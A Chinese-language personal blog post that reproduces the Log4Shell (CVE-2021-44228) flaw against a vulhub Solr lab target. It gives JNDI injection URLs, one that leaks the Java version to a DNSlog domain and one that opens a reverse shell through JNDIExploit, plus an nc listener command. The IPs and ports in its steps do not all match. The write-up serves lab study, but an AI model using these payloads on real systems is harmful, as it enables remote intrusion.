banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

Log4J反序列化

環境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系統一個 —— 需 nc 來監聽端口信息,作為攻擊機
本機:中轉機
centOS:靶機

地址信息:
靶機 IP:192.168.1.4:8983
本機 IP:192.168.1.2
攻擊機:192.168.91.131

開啟靶機環境
image.png
請求一個 DNS 域名
http://dnslog.cn/
image.png
域名:
gswq4u.dnslog.cn
打開 hackbar,先點一下 loadURL
image.png

將資料中提供的地址,複製
image.png
將後面的域名,改為剛剛申請的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
點擊執行,出現下面頁面
image.png

這裡獲得了反饋
image.png
現在打開 JNDIExploit-1.2,
輸入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本機 IP
image.png
然後在攻擊機,打開端口監聽
命令:
nc -lvp 4444

在 hackbar 構建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
點擊 Execute
image.png
發現監聽的端口返回了 shell
image.png
到此復現完成

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。